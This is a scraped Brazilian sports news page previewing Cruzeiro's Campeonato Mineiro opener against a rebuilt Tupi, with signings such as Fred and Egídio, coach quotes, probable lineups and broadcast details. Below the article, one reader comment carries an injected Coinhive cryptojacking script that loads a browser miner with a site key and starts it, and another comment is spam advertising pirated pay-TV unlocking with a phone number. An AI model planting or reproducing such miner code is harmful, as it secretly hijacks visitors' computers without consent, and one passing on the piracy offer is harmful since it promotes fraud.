logo

17/1/2018 07:19

Com Fred e Egídio no time, Cruzeiro recebe reformulado Tupi na abertura do Mineiro

Raposa estreia na temporada com dois dos sete reforços em campo; clube de Juiz de Fora passou por profundas modificações para a temporada

Com Fred e Egídio no time, Cruzeiro recebe reformulado Tupi na abertura do Mineiro
Fred está confirmado no time pelo técnico Mano Menezes (Foto: Thaynara Amaral)

Começa nesta quarta-feira uma temporada que carrega grandes expectativas para o Cruzeiro. O primeiro passo é no Campeonato Mineiro. Às 21h45 (de Brasília), o time recebe o Tupi no Mineirão. Mais de 36 mil torcedores já garantiram presença. A boa procura deve-se aos reforços do clube para a 2018. Dois deles estarão em campo nesta quarta: o atacante Fred e o lateral Egídio. O GloboEsporte.com acompanha o jogo em tempo real a partir das 20h.



A presença de Fred era interrogação até a véspera da partida. Somente nessa terça-feira, o Atlético-MG liberou a rescisão do atacante. Minutos depois, o Cruzeiro regularizou o jogador, que agora poderá reestrear com a camisa celeste. Fora das quatro linhas, novos episódios podem ocorrer. O rival exige o pagamento de uma multa de R$ 10 milhões por Fred ter assinado com o Cruzeiro, que ainda estuda a legalidade da multa.

Egídio também está de volta ao time da Toca da Raposa, depois de três anos. Os outros cinco contratados pelo clube não vão começar a partida desta quarta-feira. O meio-campista Bruno Silva e o lateral-esquerdo Marcelo Hermes ficam como opção no banco de reservas. O lateral-direito Edílson ainda trabalha a forma física. O atacante David trata de lesão. O argentino Mancuello aguarda regularização na CBF. Com esses reforços, o Cruzeiro entra forte na disputa.

- Três equipes iniciarão quarta-feira o Campeonato Mineiro com mais obrigação: Cruzeiro, Atlético-MG e América-MG, que já conquistaram, em outras oportunidades. Quem conquistou, o torcedor não se contenta mais em disputar o campeonato por disputar. Ele quer ganhar. Isso não muda absolutamente nada com o que virá pela frente. O sentimento, o desejo, de quem entra, é vencer. Os outros também trabalham bem, também tem competência, se o Cruzeiro não venceu nos últimos anos, é porque alguma coisa faltou. E nós temos que saber o que faltou e conseguir ser mais competente neste ano - disse o técnico Mano Menezes.

Um novo Tupi

O Tupi que entra em campo contra o Cruzeiro é praticamente outro time em relação ao que fez boa campanha na Série C de 2017. O grupo passou por profundas modificações e tem apenas o goleiro Vilar e o lateral Afonso entre os titulares como representantes do elenco da temporada passada. No comando, Alexandre Barroso assume o lugar deixado por Aílton Ferraz. O time não poderá contar, no entanto, com algumas das principais contratações. O meia Tchô e os atacantes Renato Kayser e Reis ainda não foram regularizados e desfalcam a equipe na rodada de abertura.

Alexandre Barroso confia em bom resultado do Tupi no Mineirão (Foto: Bruno Ribeiro)

Para surpreender, o Galo Carijó aposta no pouco tempo de preparação do Cruzeiro, que iniciou a pré-temporada mais tarde. De acordo com o técnico Barroso, caso leve o jogo para o segundo tempo em igualdade, o clube de Juiz de Fora tem chance de sair do Mineirão com um bom resultado.

- Se tivermos um jogo igual até 20 minutos do segundo tempo, temos condição de fazermos um bom resultado em Belo Horizonte. Jogar com o Cruzeiro é difícil para qualquer equipe, em qualquer lugar, em qualquer circunstância. Agora, há um detalhe: é uma equipe que vai com 15 dias de trabalho. Imagino que vão aproveitar esses dois, três primeiros jogos para rodar a equipe e começar a desenhar o que eles querem. Temos que ir de forma não muito conservadora, porque não podemos jogar 90 minutos especulando jogo. Temos que ter equilíbrio, saber jogar encurtando linhas e saindo em velocidade.

CRUZEIRO X TUPI - 1ª RODADA - CAMPEONATO MINEIRO

Local: Mineirão, BH
Data e horário: quarta-feira, 21h45 (de Brasília)
Escalação provável do Cruzeiro: Fábio; Lucas Romero, Léo, Murilo e Egídio; Henrique, Ariel Cabral e Robinho; Rafinha, Arrascaeta e Fred. Técnico: Mano Menezes
Desfalques: Edílson (aprimora a forma física), Mancuello (aguarda regularização), David, Sassá (lesionados), Dedé e Raniel (transição), Ezequiel (preparação física)
Escalação provável do Tupi: Vilar, Afonso, Sidimar, Wellington e Udson; Léo Costa, Francesco e Paulinho; Rodrigo Dias, Patrick e Rodrigo. Técnico: Alexandre Barroso
Desfalques: Tchô, Vitinho, Reis e Renato Kayser
Transmissão: TV Globo para MG - menos Juiz de Fora (com Rogério Correa, Bob Faria e Márcio Rezende Freitas) e Premiere (com Clayton Carvalho e Henrique Fernandes)
Arbitragem: Murilo Francisco Misson Júnior (CBF) apita, auxiliado por Guilherme Dias Camilo (CBF) e Pedro Araújo Dias Cotta (FMF).

3402 visitas - Fonte: Globo Esporte




e o Tiago neves não joga porque

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui.